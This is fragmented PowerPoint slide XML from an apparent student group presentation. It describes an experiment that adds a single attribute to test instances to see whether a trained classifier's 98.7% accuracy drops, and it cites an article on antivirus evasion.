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328" r:id="rId5"/>
    <p:sldId id="318" r:id="rId6"/>
    <p:sldId id="319" r:id="rId7"/>
    <p:sldId id="300" r:id="rId8"/>
    <p:sldId id="306" r:id="rId9"/>
    <p:sldId id="308" r:id="rId10"/>
    <p:sldId id="325" r:id="rId11"/>
    <p:sldId id="309" r:id="rId12"/>
    <p:sldId id="310" r:id="rId13"/>
    <p:sldId id="311" r:id="rId14"/>
    <p:sldId id="321" r:id="rId15"/>
    <p:sldId id="322" r:id="rId16"/>
    <p:sldId id="323" r:id="rId17"/>
    <p:sldId id="314" r:id="rId18"/>
    <p:sldId id="315" r:id="rId19"/>
    <p:sldId id="326" r:id="rId20"/>
    <p:sldId id="316" r:id="rId21"/>
    <p:sldId id="317" r:id="rId22"/>
    <p:sldId id="327" r:id="rId23"/>
    <p:sldId id="324" r:id="rId24"/>
    <p:sldId id="266" r:id="rId25"/>
    <p:sldId id="292" r:id="rId26"/>
    <p:sldId id="299" r:id="rId27"/>
    <p:sldId id="303" r:id="rId28"/>
    <p:sldId id="297" r:id="rId29"/>
    <p:sldId id="301" r:id="rId30"/>
    <p:sldId id="304" r:id="rId31"/>
    <p:sldId id="305"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96"/>
    <p:restoredTop sz="50000"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="60" d="100"/>
          <a:sy n="60" d="100"/>
        </p:scale>
        <p:origin x="1464" y="168"/>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1A326-476E-F040-9943-8CF1A89D00CF}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/process2" loCatId="" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple4" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E880E863-82AA-2642-9271-874F02FF8901}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            <a:t>Choose 1 attribute from the 530 attributes</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2D13D3C7-7036-3A47-825C-72740785228F}" type="sibTrans" cxnId="{4127990A-7A90-B94C-B9E4-BDA09040938C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A6C1135C-1A0B-CA4A-9EDF-BA0D6A171607}" type="parTrans" cxnId="{4127990A-7A90-B94C-B9E4-BDA09040938C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6FCBB373-5E96-3A4F-8C1D-634B117105E0}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            <a:t>Add the attribute if not present in an instance</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3086324D-BC63-E440-AE57-733F419122D0}" type="parTrans" cxnId="{8B13FC66-0BBF-3F44-B428-FA3438DAE8A7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{76B24B0D-18C5-BE48-A762-73EDE06F1EE1}" type="sibTrans" cxnId="{8B13FC66-0BBF-3F44-B428-FA3438DAE8A7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{40601B9A-BF19-C440-BFF0-ACD7F57DF94D}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            <a:t>Test “new test set” with trained model</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{25E397AB-AC9F-0B4A-94C8-6D8F5C132A1C}" type="parTrans" cxnId="{87784D7A-060C-B440-9DFC-7E45D60B735D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{42C6F935-85BA-A847-B196-CEB46E3FC18A}" type="sibTrans" cxnId="{87784D7A-060C-B440-9DFC-7E45D60B735D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA424438-F924-7546-BF4C-8E9A923F6577}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            <a:t>Compare with original accuracy</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2340E557-AFE4-4247-AEAE-18D6BBC8F753}" type="parTrans" cxnId="{84524D0F-4D02-114F-9325-1054606429DA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B1E415A5-18F2-A845-9712-A19320CA791D}" type="sibTrans" cxnId="{84524D0F-4D02-114F-9325-1054606429DA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{388A9CA1-C244-3C40-81B7-39667FC89D3F}" type="pres">
      <dgm:prSet presAssocID="{5C31A326-476E-F040-9943-8CF1A89D00CF}" presName="linearFlow" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EE2884FA-A435-2D49-A6B1-80094D6D6B32}" type="pres">
      <dgm:prSet presAssocID="{E880E863-82AA-2642-9271-874F02FF8901}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4" custScaleX="352688">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{13FFA6E3-5D85-CE4C-ADDE-892A67D25C7D}" type="pres">
      <dgm:prSet presAssocID="{2D13D3C7-7036-3A47-825C-72740785228F}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{296B6FFD-4998-9C49-AE9B-0A191EC3F83C}" type="pres">
      <dgm:prSet presAssocID="{2D13D3C7-7036-3A47-825C-72740785228F}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5CA6EC47-EE69-F547-85C0-02B78FD52AA5}" type="pres">
      <dgm:prSet presAssocID="{6FCBB373-5E96-3A4F-8C1D-634B117105E0}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="4" custScaleX="352688">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FC1235AF-C98B-D240-A9AD-95CEDBC64CE4}" type="pres">
      <dgm:prSet presAssocID="{76B24B0D-18C5-BE48-A762-73EDE06F1EE1}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BF42CB04-E74A-074D-A601-7616BB0D9BEA}" type="pres">
      <dgm:prSet presAssocID="{76B24B0D-18C5-BE48-A762-73EDE06F1EE1}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{39E344F8-802C-3947-A8CE-497365DBA8FF}" type="pres">
      <dgm:prSet presAssocID="{40601B9A-BF19-C440-BFF0-ACD7F57DF94D}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="4" custScaleX="352688">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{11949F16-C144-FD44-8E60-D324573245AE}" type="pres">
      <dgm:prSet presAssocID="{42C6F935-85BA-A847-B196-CEB46E3FC18A}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0D315F79-33C8-4D46-9744-190CA8DB6533}" type="pres">
      <dgm:prSet presAssocID="{42C6F935-85BA-A847-B196-CEB46E3FC18A}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2C5EF84B-B1C8-EA47-9111-17C0758C5E1A}" type="pres">
      <dgm:prSet presAssocID="{CA424438-F924-7546-BF4C-8E9A923F6577}" presName="node" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4" custScaleX="352688">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{13DFD9AC-18CD-3E4E-BEC9-0DB3D6E580E8}" type="presOf" srcId="{2D13D3C7-7036-3A47-825C-72740785228F}" destId="{296B6FFD-4998-9C49-AE9B-0A191EC3F83C}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{C6004307-6789-7A45-AC63-204F56C1A1BB}" type="presOf" srcId="{76B24B0D-18C5-BE48-A762-73EDE06F1EE1}" destId="{FC1235AF-C98B-D240-A9AD-95CEDBC64CE4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{B53E60F2-FAC4-7348-B512-4412508B6DD1}" type="presOf" srcId="{6FCBB373-5E96-3A4F-8C1D-634B117105E0}" destId="{5CA6EC47-EE69-F547-85C0-02B78FD52AA5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{87784D7A-060C-B440-9DFC-7E45D60B735D}" srcId="{5C31A326-476E-F040-9943-8CF1A89D00CF}" destId="{40601B9A-BF19-C440-BFF0-ACD7F57DF94D}" srcOrd="2" destOrd="0" parTransId="{25E397AB-AC9F-0B4A-94C8-6D8F5C132A1C}" sibTransId="{42C6F935-85BA-A847-B196-CEB46E3FC18A}"/>
    <dgm:cxn modelId="{74F0780D-3EB3-F349-A3AD-DCCA47E8E0EE}" type="presOf" srcId="{42C6F935-85BA-A847-B196-CEB46E3FC18A}" destId="{0D315F79-33C8-4D46-9744-190CA8DB6533}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{944F699A-9680-0546-BEE8-5CC52E906024}" type="presOf" srcId="{E880E863-82AA-2642-9271-874F02FF8901}" destId="{EE2884FA-A435-2D49-A6B1-80094D6D6B32}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{8B13FC66-0BBF-3F44-B428-FA3438DAE8A7}" srcId="{5C31A326-476E-F040-9943-8CF1A89D00CF}" destId="{6FCBB373-5E96-3A4F-8C1D-634B117105E0}" srcOrd="1" destOrd="0" parTransId="{3086324D-BC63-E440-AE57-733F419122D0}" sibTransId="{76B24B0D-18C5-BE48-A762-73EDE06F1EE1}"/>
    <dgm:cxn modelId="{71C2CF34-BC6F-CA43-80AE-FCBB652103EE}" type="presOf" srcId="{2D13D3C7-7036-3A47-825C-72740785228F}" destId="{13FFA6E3-5D85-CE4C-ADDE-892A67D25C7D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{2A0611F4-D75E-6747-8DC7-2C4E690F3960}" type="presOf" srcId="{76B24B0D-18C5-BE48-A762-73EDE06F1EE1}" destId="{BF42CB04-E74A-074D-A601-7616BB0D9BEA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{4127990A-7A90-B94C-B9E4-BDA09040938C}" srcId="{5C31A326-476E-F040-9943-8CF1A89D00CF}" destId="{E880E863-82AA-2642-9271-874F02FF8901}" srcOrd="0" destOrd="0" parTransId="{A6C1135C-1A0B-CA4A-9EDF-BA0D6A171607}" sibTransId="{2D13D3C7-7036-3A47-825C-72740785228F}"/>
    <dgm:cxn modelId="{55347388-0252-E547-BCE2-6EFB68C9052F}" type="presOf" srcId="{5C31A326-476E-F040-9943-8CF1A89D00CF}" destId="{388A9CA1-C244-3C40-81B7-39667FC89D3F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{84524D0F-4D02-114F-9325-1054606429DA}" srcId="{5C31A326-476E-F040-9943-8CF1A89D00CF}" destId="{CA424438-F924-7546-BF4C-8E9A923F6577}" srcOrd="3" destOrd="0" parTransId="{2340E557-AFE4-4247-AEAE-18D6BBC8F753}" sibTransId="{B1E415A5-18F2-A845-9712-A19320CA791D}"/>
    <dgm:cxn modelId="{87E6AC9B-7ACF-8941-B013-5E0B1ED60049}" type="presOf" srcId="{CA424438-F924-7546-BF4C-8E9A923F6577}" destId="{2C5EF84B-B1C8-EA47-9111-17C0758C5E1A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{F5FB4511-D08F-624A-B9D5-96E8816EC2D1}" type="presOf" srcId="{40601B9A-BF19-C440-BFF0-ACD7F57DF94D}" destId="{39E344F8-802C-3947-A8CE-497365DBA8FF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{199B7296-DDB5-4546-8289-EBFE558FFFFC}" type="presOf" srcId="{42C6F935-85BA-A847-B196-CEB46E3FC18A}" destId="{11949F16-C144-FD44-8E60-D324573245AE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{232101D3-5291-3A4B-96B3-BBAAC3BC1BE9}" type="presParOf" srcId="{388A9CA1-C244-3C40-81B7-39667FC89D3F}" destId="{EE2884FA-A435-2D49-A6B1-80094D6D6B32}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{2EA1D139-69FF-AB44-A21D-7D710236CCAC}" type="presParOf" srcId="{388A9CA1-C244-3C40-81B7-39667FC89D3F}" destId="{13FFA6E3-5D85-CE4C-ADDE-892A67D25C7D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{EE9E911C-17C5-B642-8433-09C866DE9F43}" type="presParOf" srcId="{13FFA6E3-5D85-CE4C-ADDE-892A67D25C7D}" destId="{296B6FFD-4998-9C49-AE9B-0A191EC3F83C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{9F2BC5DE-8A9D-274E-930C-F3DF125A334A}" type="presParOf" srcId="{388A9CA1-C244-3C40-81B7-39667FC89D3F}" destId="{5CA6EC47-EE69-F547-85C0-02B78FD52AA5}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{E8AE899F-FDB0-944D-93C4-A2398A0E972D}" type="presParOf" srcId="{388A9CA1-C244-3C40-81B7-39667FC89D3F}" destId="{FC1235AF-C98B-D240-A9AD-95CEDBC64CE4}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{9FDAD534-224F-3342-92D1-83417E0DEF66}" type="presParOf" srcId="{FC1235AF-C98B-D240-A9AD-95CEDBC64CE4}" destId="{BF42CB04-E74A-074D-A601-7616BB0D9BEA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{C638A225-EFA0-5D4F-9398-A154E9F4E268}" type="presParOf" srcId="{388A9CA1-C244-3C40-81B7-39667FC89D3F}" destId="{39E344F8-802C-3947-A8CE-497365DBA8FF}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{7EEEB2C5-61EC-324A-8017-AC893F3BA360}" type="presParOf" srcId="{388A9CA1-C244-3C40-81B7-39667FC89D3F}" destId="{11949F16-C144-FD44-8E60-D324573245AE}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{C8B093AD-B9D9-D14D-837A-38F5AA7FC6ED}" type="presParOf" srcId="{11949F16-C144-FD44-8E60-D324573245AE}" destId="{0D315F79-33C8-4D46-9744-190CA8DB6533}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{0AB27807-FE8D-BA41-A9A1-7B2733800EBB}" type="presParOf" srcId="{388A9CA1-C244-3C40-81B7-39667FC89D3F}" destId="{2C5EF84B-B1C8-EA47-9111-17C0758C5E1A}"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884FA-A435-2D49-A6B1-80094D6D6B32}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="45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Choose 1 attribute from the 530 attributes</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="24854" y="29418"/>
        <a:ext cx="8078292" cy="798858"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{13FFA6E3-5D85-CE4C-ADDE-892A67D25C7D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3904893" y="87434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906166"/>
        <a:ext cx="229112" cy="222748"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5CA6EC47-EE69-F547-85C0-02B78FD52AA5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="12774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 the attribute if not present in an instance</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="24854" y="1302268"/>
        <a:ext cx="8078292" cy="798858"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FC1235AF-C98B-D240-A9AD-95CEDBC64CE4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3904893" y="214719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2179016"/>
        <a:ext cx="229112" cy="222748"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{39E344F8-802C-3947-A8CE-497365DBA8FF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="25502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Test “new test set” with trained model</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="24854" y="2575118"/>
        <a:ext cx="8078292" cy="798858"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{11949F16-C144-FD44-8E60-D324573245AE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3904893" y="3420044"/>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3451865"/>
        <a:ext cx="229112" cy="222748"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2C5EF84B-B1C8-EA47-9111-17C0758C5E1A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="38231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Compare with original accuracy</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="24854" y="3847968"/>
        <a:ext cx="8078292" cy="798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31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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11119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43392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which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>attr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> we change,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> does not work at all</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154503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28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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6195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4/13/17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x.github.io/" TargetMode="Externa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archsecurity.techtarget.com/feature/Antivirus-evasion-techniques-show-ease-in-avoiding-antivirus-detection" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.informit.com/articles/article.aspx?p=26150&amp;seqNum=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dirty="0" smtClean="0"/>
              <a:t>Group 10</a:t>
            </a:r>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4540247"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2592925" y="1576386"/>
          <a:ext cx="8128000" cy="467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537855" y="624110"/>
            <a:ext cx="10515600"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Naïve Modification : Adding Single Attribute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16355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E2884FA-A435-2D49-A6B1-80094D6D6B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3FFA6E3-5D85-CE4C-ADDE-892A67D25C7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CA6EC47-EE69-F547-85C0-02B78FD52AA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FC1235AF-C98B-D240-A9AD-95CEDBC64CE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9E344F8-802C-3947-A8CE-497365DBA8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1949F16-C144-FD44-8E60-D324573245A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2C5EF84B-B1C8-EA47-9111-17C0758C5E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5" y="624110"/>
            <a:ext cx="10515600" cy="1280890"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Naïve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Modification : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Adding Single Attribute</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711" y="1316278"/>
            <a:ext cx="7348208" cy="5499202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8049193" y="3281049"/>
            <a:ext cx="2928142" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Better solution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638787" y="1316278"/>
            <a:ext cx="3603475" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Original Accuracy:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		98.7%</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
